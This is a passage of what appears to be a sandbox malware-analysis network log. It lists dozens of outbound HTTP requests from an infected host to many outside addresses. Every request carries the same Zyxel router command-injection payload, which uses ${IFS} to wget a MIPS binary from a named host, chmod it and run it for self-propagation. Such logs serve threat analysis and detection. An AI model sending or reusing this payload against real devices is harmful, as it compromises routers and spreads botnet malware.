                                      Jan 19, 2024 17:29:32.777645111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4547192.168.2.144671014.233.184.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777700901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4548192.168.2.1448362132.98.97.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777728081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4549192.168.2.1454704130.180.14.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777760029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4550192.168.2.1443192147.209.152.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777786970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4551192.168.2.1449018201.19.188.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777832031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4552192.168.2.143526218.243.236.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.777865887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4553192.168.2.145735683.140.237.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.780970097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4554192.168.2.1458310168.97.61.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789305925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4555192.168.2.143305850.137.25.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789351940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4556192.168.2.1458182135.200.205.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789387941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4557192.168.2.1438746196.43.119.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789414883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4558192.168.2.1433632115.133.79.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789465904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4559192.168.2.1455432108.146.243.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789526939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4560192.168.2.143907279.106.28.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789542913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4561192.168.2.1433498136.109.222.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789587021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4562192.168.2.144668620.43.205.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789627075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4563192.168.2.1433702173.183.253.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789654970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4564192.168.2.144990064.110.17.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789702892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4565192.168.2.1438506146.128.48.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789761066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4566192.168.2.1436930190.201.185.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789788961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4567192.168.2.1436720125.68.103.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789830923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4568192.168.2.144736277.110.78.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789864063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4569192.168.2.1448170119.47.168.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789930105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4570192.168.2.1451252175.199.14.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.789949894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4571192.168.2.1441720143.189.103.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790002108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4572192.168.2.1443960188.157.143.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790030956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4573192.168.2.144621865.142.254.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790071964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4574192.168.2.1460464197.7.193.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790103912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4575192.168.2.145374284.75.125.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790154934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4576192.168.2.1442874201.52.194.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790199041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4577192.168.2.1438544212.203.126.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790255070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4578192.168.2.1458692154.113.156.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790299892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4579192.168.2.1455600170.202.169.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790355921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4580192.168.2.1435884122.24.104.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790394068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4581192.168.2.1455058114.92.131.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790425062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4582192.168.2.1435030183.134.108.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790455103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4583192.168.2.1442996147.61.15.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790507078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4584192.168.2.146026085.141.39.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790537119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4585192.168.2.1454042144.55.188.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790576935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4586192.168.2.143447814.89.20.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790596962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4587192.168.2.145323495.254.56.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790638924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4588192.168.2.145738263.63.40.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790683985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4589192.168.2.1449636140.158.253.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790735960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4590192.168.2.144756496.98.128.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790770054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4591192.168.2.145842459.205.75.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790818930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4592192.168.2.145691243.176.131.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790842056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4593192.168.2.145201858.245.178.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790875912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4594192.168.2.145928483.33.238.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790934086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4595192.168.2.1442816208.154.155.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.790983915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4596192.168.2.1444452144.23.37.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791027069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4597192.168.2.1448548132.50.249.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791064024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4598192.168.2.1457582154.11.244.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791094065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4599192.168.2.143495651.54.86.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791131020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4600192.168.2.145036466.26.38.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791178942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4601192.168.2.1433074104.143.152.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791213036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4602192.168.2.1435090188.43.194.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791241884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4603192.168.2.1445652185.203.198.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791281939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4604192.168.2.1434012130.235.60.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791316032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4605192.168.2.1441194185.95.238.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791330099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4606192.168.2.143708292.138.86.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791383982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4607192.168.2.1457280133.1.202.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791404009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4608192.168.2.1445970189.192.110.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791426897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4609192.168.2.1449194114.158.251.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:33.791476011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4610192.168.2.145816896.138.112.209443
                                      TimestampBytes transferredDirectionData
